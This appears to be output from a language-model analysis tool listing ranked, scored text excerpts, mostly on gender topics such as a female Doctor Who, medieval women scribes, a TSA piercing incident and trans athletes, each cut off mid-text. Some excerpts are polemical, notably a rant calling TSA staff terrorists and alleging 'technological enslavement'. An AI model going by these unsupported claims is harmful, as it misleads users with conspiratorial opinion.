exclusion of [the female] gender from the Tardis’ — as if not having a female Doctor was an act of misogynistic repression rather than just a quirk of TV history. A writer for Variety says women have ‘won a victory’. She hails the casting of Whittaker because it ‘sends a message’ — that women and girls will no longer be ‘shut out of seeing themselves on screen in plum roles’. Women don’t land plum roles? Is that true? Tweeting, weeping liberals claim a female Doctor will have a revolutionary impact on their daughters’ sense of self-worth. I don’t know what I find more dubious: the notion that teen girls watch Doctor Who or that a Whittaker Time Lord will boost feminine self-esteem across the land. + +The overblown response to the thirteenth Doctor confirms how stupid, and worse, identity politics is. It confirms how obsessed the virtual left is with +================================================================================ +Rank = 66; Score = 352256.0 +<|begin_of_text|>Recently, we received a query asking, 'Which is the earliest European manuscript in the British Library’s collections that was created by a female scribe?' The short answer is: we can’t tell! Female scribes worked on many of the same sorts of texts as male scribes and used the same sorts of scripts. Therefore, unless they signed their work or left other clues, there is no way of telling whether a given text was copied by a man or a woman. Luckily, however, there are clues in several relatively early Greek and Latin manuscripts at the British Library, including a letter from the 2nd century BC and an illustrated copy of scientific works from the 12th century. + +Diagram of the four seasons and four cardinal directions, from a copy of Isidore's De natura rerum: copied by 8 female scribes at Munsterblisen, c. 1130–1174, Harley MS 3099, f. 156r + +The easiest way to tell if a manuscript was created by a female scribe or scribes is if they left in the book a note which recorded their names or details about themselves. Admittedly, these sorts of notes should be treated with caution: sometimes, later scribes could copy a note left by the scribe of their exemplar along with the rest of the text. Still, there seem to be plausible examples which record female scribes. For example, a note in one copy of Isidore of Seville’s Etymologiae and De natura rerum (Harley 3099) claimed it was copied by no less than 8 female scribes from the Benedictine nunnery of Munsterblisen, near Maastricht: + +These are the names of those women who wrote [scripserunt] this book: Gerdrut, Sibilia, Vierwic, Walderat, Hadewic, Lugart, Derta, Cunigunt. Indeed, they wrote for those in charge of the monastery [monasteriensibus dominis], that they might ask God for them to free them from punishment and establish them in Paradise. May whoever steals [this book] from them be cursed! [The date 1134 has been added by a later hand.] + +All the signing ladies: note naming female scribes, Harley MS 3099, f. 166r + +This is not even the earliest example of a manuscript possibly signed by a woman. Notes in a commentary on the Ps +================================================================================ +Rank = 67; Score = 352256.0 +<|begin_of_text|>Lee Rogers + +Rogue Government + +March 28, 2008 + +The terrorists in the Transportation Security Administration otherwise known as the TSA responded to news of a woman saying that security screeners humiliated her by forcing her to remove body piercings because they set off the metal detector alarm. The woman was forced to remove the piercings with pliers while low class TSA goons laughed at her. The TSA claims that there are numerous incidents of female terrorists hiding explosives in sensitive areas of the human body so that’s why the actions by the security screeners were warranted. It is funny how the TSA declines to list all of these different incidents involving female terrorists hiding explosives around their private areas. The bottom line is that the TSA’s main purpose is not to provide safety but instead to ensure that the American people are acclimated into the 21st century technological enslavement system. How does forcing people to remove body piercings keep the American people safe from terrorism? The whole thing is a joke and the TSA should be abolished and their $10 an hour employees should find their way to an unemployment line. + +Here is a blurb from an Associated Press report detailing this particular incident. + +A Texas woman who said she was forced to remove a nipple ring with pliers in order to board an airplane called Thursday for an apology by federal security agents and a civil rights investigation. + +"I wouldn’t wish this experience upon anyone," Mandi Hamlin said at a news conference. "My experience with TSA was a nightmare I had to endure. No one deserves to be treated this way.” + +Hamlin, 37, said she was trying to board a flight from Lubbock to Dallas on Feb. 24 when she was scanned by a Transportation Security Administration agent after passing through a larger metal detector without problems. + +The female TSA agent used a handheld detector that beeped when it passed in front of Hamlin’s chest, the Dallas-area resident said. Hamlin said she told the woman she was wearing nipple piercings. The agent then called over her male colleagues, one of whom said she would have to remove the jewelry, Hamlin said. + +Hamlin said she could not remove them and asked whether she could instead display her pierced breasts in private to the female agent. But several other male officers told her she could not board her flight until the jewelry was out, she said. + +She was taken behind a curtain and managed to remove one bar-shaped piercing but had trouble with the second, a ring. + +"Still crying, she informed the TSA officer +================================================================================ +Rank = 68; Score = 352256.0 +<|begin_of_text|>There’s no such thing as “books for boys” and “books for girls.” But because gendering is a cultural phenomenon, brought on by social beliefs that there are inherent and important differences between boys and girls, it’s impossible to escape those ideas. This is why adults continue to lament the lack of books “for boys” in the world. It’s why there are continuous articles and think pieces about what happened to the books “for boys” in kid lit. Even the most well-meaning, socially-conscious adults fall into this trap, believing that the boys are being left behind and that girls and girl interests “dominate” the children’s book world. + +But what does it mean for a book to be “for boys?” Is it a male author? Is it a male main character? Is it a book that appeals to the interests of boys specifically, whatever those are? + +Today, Amazon released their 2014 top-selling titles. Let’s take a look at what the hits in kids and teens were. + +It’s a nice mix of books for very young readers, as well as books for those who are older teen readers. But…tell me where the women are dominating here? + +If we were to break down the books by gender — which is subjective and ridiculous, but we’re going to do it — then we could note that male authors constituted 11 of the 20 authors on the list. There were 7 female authors listed and there were two books from Scholastic, with no authorship attached. I did not count Kathryn Limbaugh because the books isn’t selling on her authorship in the least (that’s all Rush), and I did not count Michael Chamberlain because he’s a narrator, not the writer. + +If you rolled the Minecraft books into the male author category, which makes sense since Minecraft is a “boy” thing, then you’d show 13 “books for boys” and 7 “books for girls.” + +But wait! + +Veronica Roth’s Four isn’t about a female character. It’s a collection of short stories about Four, a main male character in her best-selling Divergent series. So let’s move that book over to the “books for boys” category, too. Now we’re up to 14 “books for boys” and 6 “books for girls.” If you’re going to play by that game, too, then R. J. Palacio’s The Julian Chapter is also a “book for boys,” since the main character is a boy and he’s featured +================================================================================ +Rank = 69; Score = 348160.0 +<|begin_of_text|>KOZHIKODE: Controversial Salafi preacher Abdul Muhsin Aydeed has come up with a suggestion that Muslim doctors should not use the Red Cross emblem or the Rod of Asclepius symbol (representing Greek God of healing), as they are against the monotheism in Islam.In a post titled ‘Some Islamic Advise to Doctors’ which appeared on Alaswala Facebook page, Aydeed also advised the doctors not to touch women patients as far as possible and not to encourage ‘male-female mixing’ in hospitals and consulting rooms.“Certain symbols related to idol worship are widely seen in the houses, vehicles, consulting rooms and on the prescription pads of doctors. An example is the cross in red colour, which signifies the belief in Trinity by the Christians. Trinity is the worst form of the shirk (polytheism), and is the most detested sin in Islam,” he said.Similarly, the Rod of Asclepius, denotes the Greco-Roman Gods of life and health, he said. “The beliefs that destroys Thouheed (monotheism), the cardinal principle in Islam, should be kept at arm’s length. These kinds of wrong beliefs may unknowingly sneak into the belief system of Muslims and they may distance themselves from Islam. A Muslim doctor should keep away from all the signs and slogans that are against Islam,” he said.The Salafi preacher said a Muslim woman can approach a male Muslim doctor if she fails to find a Muslim female doctor. “The male doctor should look at or touch the female patient only in an unavoidable situation. He should use hand gloves if he decides to touch the female patient,” Muhsin said adding touching without gloves is allowed only in extreme situations.The woman patient should be asked to cover all other parts of her body which do not need examination. The Islamic principle that a male should not be alone with an unknown female is applicable in the case of doctors too. “The presence of husband or ‘mahrams’ is mandatory while being examined by the male doctor, “Muhsin said. (Mahrams are the persons who are allowed to escort a Muslim woman when she travels) “At least a woman from the family of the patient should be present at the time of examination. If all these are not available, the male doctor should examine the patient after the keeping open the door and standing on the other side of a veil,” suggests Muhsin.In his opinion, cosmetic or plastic surgery is not allowed in Islam as it amounts to intervening in +================================================================================ +Rank = 70; Score = 346112.0 +<|begin_of_text|>In September, rental agent Lynne Hubbard sat in a cafe across from Dr. John Getzow, whom she was considering as a potential tenant for a room above O'Reilly's Holy Grail restaurant and bar on Polk Street. He was clean-cut and well dressed. He was a doctor, after all, and he seemed eager to find a place to live. But there was something faintly odd about him. + +Getzow, 55, had arranged to meet Hubbard at the Crepe House on Polk. Once he sat down at the table, he told her about his technical consulting firm that helped hospitals with billing software. He went on to say he was active in city politics; he had worked on Mayor Gavin Newsom's campaign, and was currently involved in fund-raising for Senator Barack Obama's bid for the presidency. + +At one point Getzow moved aside the coffee mugs on the small table and placed a leather-bound portfolio in front of Hubbard. He flipped through pages of references from former landlords, invoices addressed to hospitals for huge sums — even a letter of recommendation from Newsom's former campaign manager. + +"I thought the portfolio presentation was a bit much for a room over O'Reilly's Holy Grail," Hubbard says. "He was trying too hard to impress me, but I wasn't sure why. I thought maybe it was because I'm female." + +Considering Getzow's glowing credentials, Hubbard never would have guessed that when she accepted his application for the apartment in Myles O'Reilly's building, his tenancy would eventually cost the landlord thousands of dollars and climax in Getzow's arrest for assault. + +As it turned out, Getzow was not a licensed doctor in California, although he did work sporadically as a medical software consultant. He also was not as integral to the political campaigns he had volunteered for. In fact, he was one of the most successful "serial evictees" in San Francisco, a select group of tenants who take advantage of the city's lenient courts and tenant-support nonprofits to tie up landlords in court for months while they live practically rent-free in one of the most expensive cities in the country. + +Depending on the vigilance of the landlord, a seasoned serial evictee like Getzow can get away with a minimum of 45 days and sometimes up to a year of free rent. The actual number of serial evictees operating in San Francisco is difficult to track, but some attorneys who specialize in representing landlords estimate there are between 20 and +================================================================================ +Rank = 71; Score = 344064.0 +<|begin_of_text|>The state of Washington may soon follow Oregon and California and allow a third gender option on birth certificates. The proposal would let people change their gender from male or female to the non-binary designation of “X.” + +Currently, people born in Washington can petition to change the gender on their birth certificate from male to female or female to male. But there isn’t an option to choose no gender. + +That may soon change. Christie Spice with the Washington Department of Health said that’s because society is changing. + +“And more people are identifying as a gender other than a male or female and there’s growing demand for non-binary sex designations on all identity documents, including birth certificates,” Spice said. + +Under the proposed change, adults could request an “X” designation on their birth certificates. Children could also make the change with the consent of their parents and with a doctor’s note. + +The Washington Department of Health will hold a public hearing Tuesday from 1 p.m. to 5 p.m. in Tumwater on this proposed rule change. Online comments will be accepted until 5 p.m. Tuesday as well. + +The Department of Health has already received about 1,000 written comments both in support and against the change. The new rule could go into effect early next year. + +A new Oregon law allowing an “X” designation on birth certificates takes effect on January 1, 2018. In June, Oregon became the first state in the nation to allow a third gender option for driver licenses and state identification cards. + +A spokeswoman for Washington’s Department of Licensing said the agency is in the early stages of considering whether it can offer a gender neutral designation on state ID cards.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 72; Score = 344064.0 +<|begin_of_text|>Transgender student reports sex assault at Hercules school + +(03-03) 22:21 PST SAN FRANCISCO -- A 15-year-old transgender student reported being attacked and sexually assaulted Monday at the same Hercules school where another transgender student was involved in a fight four months ago, police said. + +The latest incident - which is being investigated as a hate crime - was reported at Hercules Middle/High School on Refugio Valley Road about 11 a.m. by a transgender student who identifies as male, said Hercules police Detective Connie Van Putten. + +The student said he was leaving the boys' bathroom when in a building on the high school part of campus when he was confronted by three male juveniles, Van Putten said. + +The three pushed him into the bathroom's disabled stall, where they physically and sexually assaulted him, police said. + +The boy's parents were notified, and he was taken to a hospital, Van Putten said. + +Police were interviewing witnesses and had not identified suspects. + +On Nov. 13, another transgender student, Jewlyes Gutierrez, 16, got into a fight with several students on campus, with a portion of the confrontation caught by a witness's cell-phone camera. + +Gutierrez, who was born male but considers herself female, was charged with misdemeanor battery, but if she successfully completes a conflict resolution program, the allegation will be dropped, a judge said last month. + +Charles Ramsey, president of the West Contra Costa County Unified School District board, said of Monday's incident, "I want to tell the parents that my heart goes out to them. I feel really bad for the victim." + +Ramsey also sounded a warning to the attackers: "You will be expelled. You will be punished, and what we'll ask is that you are prosecuted to the fullest extent of the law. You can't assault students on campus, no matter who they are."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 73; Score = 342016.0 +<|begin_of_text|>MMA’s first openly trans athlete still encounters prejudice inside and outside the sport and says media are partly to blame: ‘We don’t tell people to write stories in respectful ways’ + +An athlete and a transgender person – that both identities could be conceivable fascinates our media landscape, from the New York Post all the way up to the New York Times. This is perhaps why speculation about Bruce Jenner’s gender identity has been disappointingly rife in recent weeks, even though the athlete has not spoken out about it. + +Fallon Fox knows what it’s like to be the focus of rumours and hearsay. She is a mixed martial arts (MMA) fighter – and the first openly trans athlete in the sport’s history. + +Fox is intimately familiar with our culture’s treatment of trans athletes. She was not out publicly when she began competing, although licensing commissions knew she was trans. But after Fox began winning, a reporter called her and made it clear he knew she was trans. Fox understood she had to get ahead of the story, so she came out in an Outsports article in March 2013. + +When I ask Fox about the obsessive interest in an athlete’s transition, she brings up the retrogressive idea that, despite the fact that there are actually many female athletes, sports are men’s domain. This leads people to see Jenner’s athletic abilities as a sign of maleness, making the possibility that Jenner might be trans a contradiction to gawk at. + +Fallon Fox: ‘I want to bring my people with me.’ Photograph: Rhys Harper + +I ask Fox about being put in the position of having to come out publicly so early in her career. “That sucked. I expected that someone was going to out me; you just can’t go through life with a microscope on your career without someone delving into your past a little bit,” she says. “But it’s something you really can’t prepare yourself for.” Her face grows serious. “The scope of anger and vitriol that I received initially... That was disheartening, tragic. It was mind-blowing.” + +This is not how Fox wanted her career to go. Her dream narrative would have been for her to go in there just like any other fighter would, collecting wins, hopefully ending up the best female fighter on the face of the planet. “I suppose I’d like all of that still,” she says pensively. “But in addition to that, I want to bring my people with me.” + +Fox’s interest in MMA stemmed from the fact that +================================================================================ +Rank = 74; Score = 339968.0 +<|begin_of_text|>Star Wars and the Awakening of Feminism: Episode VII Is a Feminist's Dream Come True + +Since its creation in the 1970s, the Star Wars franchise has never been big on gender representation. Although both trilogies had iconic female characters like Princess Leia and Queen Padme Amidala, both came to us neatly wrapped in Hollywood tropes and gender stereotypes. + +While Leia's strong character, who was also a badass leader, was exemplary for her time, her gratuitous appearance in the gold slave bikini burnt 70s feminism to the ground, and women's empowerment had to start from scratch in the sci-fi world. + +The prequel trilogy started out well with Padme — a young Queen who is a political prodigy of sorts — but her badassery fizzled out as soon as the franchise turned her into the swooning love interest of the unstable Anakin Skywalker, and one who dies for literally no good reason (except of course, the screenwriter's convenience). + +The latest instalment of Star Wars, however, made us fangirls spontaneously explode with happiness like a destroyed death star. Star Wars Episode VII: The Force Awakens is feminist and it doesn’t even try to make a radical statement while at it. + +Not only the lead roles, but even some minor aspects of the film proved that the fantasy and sci-fi world doesn’t necessarily need to be an exclusive boy’s club. This film is definitely a win in terms of progress and gender equality, and here are some reasons why we simply loved it and urge everyone to watch it. + +Careful for spoilers, if you haven’t seen the film yet. + +The protagonist is female, and a total badass. + +Star War’s newest Jedi, Rey, is a girl who is a survivor, who can hold her own in battle, and be a total badass while at it. She isn’t a silent bystander, who needs rescuing at the hilt of the fight when the antagonist is delivering the final blow. She is an active participant in the fight who makes the audience experience the intensity and tension she is going through. + +She is also, by no means, a damsel in distress, and her gender is secondary to her storyline and character. Even incidental, some would say, as her being female is of no significance or importance to her overall character development in the film. She is simply a better warrior, a skilled pilot, and scavenger who just happens to be a woman. Additionally, nowhere in the film is she sexualised, and her attire throughout resembles the +================================================================================ +Rank = 75; Score = 335872.0 +<|begin_of_text|>British anthropologist Arthur Thomson, in the late 1800’s published his observations on nose size and shape. He noted that humans from humid, warm climates have wider, shorter noses than humans from colder, dryer climates who have more narrow, longer noses. He carried on his observation postulating that the shape of the nose was influenced by the climate. The shape of a nose, a structure meant to humidify air and warm it, aside from assist in smell was more determined by climate than any other factor. Thomson’s Nose Rule, as it is known now, is taught in many biological anthropology courses. No one however has studied the how and why… Until recently. + +A PLOS Genetics study published yesterday affirms that Thomson was actually sniffing up that exact pole. The authors primarily looked to understand how human variation arose. Arslan Zaidi, a postdoctoral fellow in Penn State’s department of biology and the lead author asks, + +“…why do we look different from one another? Why do males and females look different? Why are there differences among humans from different populations? We focused on the nose because there is a huge body of work suggesting that it may have evolved in response to climate.” + +The team focused on South Asian, East Asian, West African and Northern European ancestries. They used 3D facial imaging and examined the width of the nostrils, the distance between nostrils, the height of the nose, nose ridge length, nose protrusion, external area of the nose, and the area of the nostrils. + +Then they asked two questions, + +Are there variations in nose shape within the expectations of genetic drift or more varied? If more varied, can climate be an influence? + +They were able to identify a positive correlation between nostril width and temperature and humidity. This implies there is a selective force in the evolution of the human nose. In fact the researchers state it is the most influential factor to the size and shape of noses we see; validating Thompson’s theory. + +What about culture? With an equal distribution of males to females in the four regions why do males tend to have larger noses than females (Fig 2, below). Does this variation occur because humans prefer mates with smaller or larger noses… A element of sexual selection. + +I certainly think cultural concepts of beauty may be related to how well-adapted a nose is to the local climate. But paper implies the selective pressure of climate outweighs that of culture. So why then are female noses smaller than males of the same climate, when adjusted for differences of +================================================================================ +Rank = 76; Score = 333824.0 +<|begin_of_text|>A fear and misunderstanding of how to date online is keeping Japanese singles from connecting. Flickr/takasuii For a country that excels in technology, Japan hasn't mastered "swiping right." + +In the face of a serious population decline, the country hasn't got a clue when it comes to online dating. + +According to a 2012 report by Japan's National Institute of Population and Social Security Research, the number of Japanese people will fall from 127 million to around 87 million by 2060. + +To add to that, a 2014 survey by the Japan Family Planning Association found that 49% of all respondents had not had sex in the past month, and 18% of men said they had no interest in sex at all. "The Japanese are legitimately worried about running out of Japanese people," comedian Aziz Ansari writes in his new book, "Modern Romance," co-authored by sociologist Eric Klinenberg. + +Ansari notes that Japanese culture and the fear of being perceived as "charai" (or "a sleazy player") may explain why online dating hasn't exploded in Japan. + +He also cites a problem with profile photos: "In Japan, posting any pictures of yourself, especially selfie-style photos, comes off as really douchey." + +"The Japanese feel like [selfies are] so narcissistic," a 29-year-old Japanese woman named Kana told the comedian-turned-author. So instead, they use photos with two or more people, or no people at all. Kana mentioned that a lot of people just post photos of their cats, or, oddly, a rice cooker. + +According to one Japanese woman, it's not uncommon to see a photo of a rice cooker on someone's online dating profile. Flickr/micropig + +But peculiar profile pictures aren't the only reason online dating is floundering in Japan. + +As a recent Fast Company article points out, many Japanese still view online dating as a scam. That perception dates back to the '90s, when pseudo dating sites required men to pay per message and had their employees pose as female subscribers. + +And in present day, scam sites prevail. This past June, The Daily Mail reported that eight executives were arrested in Japan after allegedly fake dating sites they created in 2004 were exposed. As in the '90s, the executives allegedly paid their male employees to act as women and required subscribers to pay money to talk to the "girls." + +Out of the 2.7 million members on the site, only one was female +================================================================================ +Rank = 77; Score = 331776.0 +<|begin_of_text|>Women are so fed up with male entitlement that they’ve not only begun coining terms to classify it—“manspreading” or “mansplaining,” for example—but they’ve also started devising social experiments to find out what happens when women stop being polite and start acting like, well, men. + +In an unscientific (but revealing) experiment launched on Friday, Tumblr user Claire Boniface announced that whenever she received a compliment from a male stranger online, she’d agree with him rather than simply ignore the comment or accept it with a gracious “thank you.” + +Like many other girls and women online, Boniface was sick of getting criticized by strangers who complimented her photos and then expected a conversation in return. + +“If a guy messages me I usually don’t reply because most of the time they are complete strangers to me,” 18-year-old Gweneth Bateman, a British teenager who undertook the Tumblr-based social experiment, told BuzzFeed News. “When they don’t get a reply out of me it usually ends up with them calling me ‘rude’ or a ‘bitch.’ ” + +So Bateman flipped the table, responding to texts about her “gorgeous eyes” with affirmations such as “Thank you, I know.” As predicted, the men on the other side of the screen failed the experiment miserably, berating her for her confidence and then retracting the compliment altogether. Bateman cites it as an example of the way men are uncomfortable “when women own their own awesomeness.” + +In part two of the experiment, posted to her Twitter account Tuesday, Bateman said she received an equally hateful reaction from men even when she politely agreed with them. The experiment has called attention to the way women’s behavior is judged by different standards from men’s. “If you reject a compliment you’re ‘attention seeking’ but if you accept it you’re ‘vain’ so [you] really can’t win either way,” she tweeted Monday. + +Bateman and Boniface weren’t the only women who recently went to great lengths to give men a taste of their own privilege. In November of last year, New York–based labor organizer Beth Breslaw decided that rather than intuitively moving out of the way for people in her path, she’d take a more masculine approach and continue walking, with no regard for other pedestrians. + +She got the idea from a friend who initiated the experiment after hearing that men were less likely than women to make room for others on a crowded street. The experiment was not only startling +================================================================================ +Rank = 78; Score = 331776.0 +<|begin_of_text|>Women Earn 16% Less Than Men in Management Positions in Europe + +A new report by Eustat reveals some interesting details about the state of the genders within the European Union. Women are more educated, more active, and healthier than men, all the while receiving smaller salaries. + +Quality and trajectory of the lives of both sexes + +On average, women leave the family home at age 25, while men do it two years later. The average European of the fairer sex lives to the age of 83, 6 years longer than men. Women are also 7 times likely to be single parents than men. That could be attributed to the European custody laws that favor women and the higher mortality rate of men. Despite that, males are more likely to be satisfied with their own health. + +The two genders at work + +On paper, women should be more qualified to hold higher professional positions, as 33% of them have higher education in comparison to 29% of men. However, males in management get 16% more money than their female counterparts and double them in quantity. Latvia has the largest percentage of female managers, at 47%, while Luxemburg has the lowest at 17% + +Relaxation on Mars vs. Socializing on Venus + +Women spend more time and money on more social leisure, like going to the theatre, the cinema, or to cultural sites. Women are also more likely to read books – 42% compared to men’s 31%. Men will use the Internet more, with 81% of them using it at least once a week compared to 77% in females. + +Unsurprisingly, women are more likely to do house chores and care for children. 91% of females age 25-49 watched over their kids in comparison to 68% of males in the same age group.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 79; Score = 331776.0 +<|begin_of_text|>Energy development is the field of activities focused on obtaining sources of energy from natural resources. These activities include production of conventional, alternative and renewable sources of energy, and for the recovery and reuse of energy that would otherwise be wasted. Energy conservation and efficiency measures reduce the demand for energy development, and can have benefits to society with improvements to environmental issues. + +Societies use energy for transportation, manufacturing, illumination, heating and air conditioning, and communication, for industrial, commercial, and domestic purposes. Energy resources may be classified as primary resources, where the resource can be used in substantially its original form, or as secondary resources, where the energy source must be converted into a more conveniently usable form. Non-renewable resources are significantly depleted by human use, whereas renewable resources are produced by ongoing processes that can sustain indefinite human exploitation. + +Thousands of people are employed in the energy industry. The conventional industry comprises the petroleum industry, the natural gas industry, the electrical power industry, and the nuclear industry. New energy industries include the renewable energy industry, comprising alternative and sustainable manufacture, distribution, and sale of alternative fuels. + +Classification of resources [ edit ] + +Open System Model (basics) + +Energy resources may be classified as primary resources, suitable for end use without conversion to another form, or secondary resources, where the usable form of energy required substantial conversion from a primary source. Examples of primary energy resources are wind power, solar power, wood fuel, fossil fuels such as coal, oil and natural gas, and uranium. Secondary resources are those such as electricity, hydrogen, or other synthetic fuels. + +Another important classification is based on the time required to regenerate an energy resource. "Renewable" resources are those that recover their capacity in a time significant by human needs. Examples are hydroelectric power or wind power, when the natural phenomena that are the primary source of energy are ongoing and not depleted by human demands. Non-renewable resources are those that are significantly depleted by human usage and that will not recover their potential significantly during human lifetimes. An example of a non-renewable energy source is coal, which does not form naturally at a rate that would support human use. + +Fossil fuels [ edit ] + +Fossil fuel (primary non-renewable fossil) sources burn coal or hydrocarbon fuels, which are the remains of the decomposition of plants and animals. There are three main types of fossil fuels: coal, petroleum, and natural gas. Another fossil fuel, liquefied petroleum gas (LPG), is principally derived from the production of natural gas. Heat +================================================================================ +Rank = 80; Score = 329728.0 +<|begin_of_text|>LONDON — The first thought that struck me about the Serpentine Gallery’s exhibition of Swedish artist Hilma af Klint, Painting the Unseen, was: Thank goodness — finally a solo show starring a female artist! And not just any female artist: Hilma af Klint is a brilliant choice. Few people beyond the art world have heard of her, and the work on view here proves that she was such an intriguing individual and artist, this show is so much more than the product of tokenism. + +Upon entering, you’re greeted with enormous, geometric murals in flat blocks of color, instantly recognizable as in some way spiritual, even occult. Glance at the date and you see that af Klint effectively ventured into the principles of abstraction well before its more famous exponents (Kandinsky, Mondrian, and Malevich), something the publicity material takes pains to emphasize. Even more fascinating is that the abstract works here 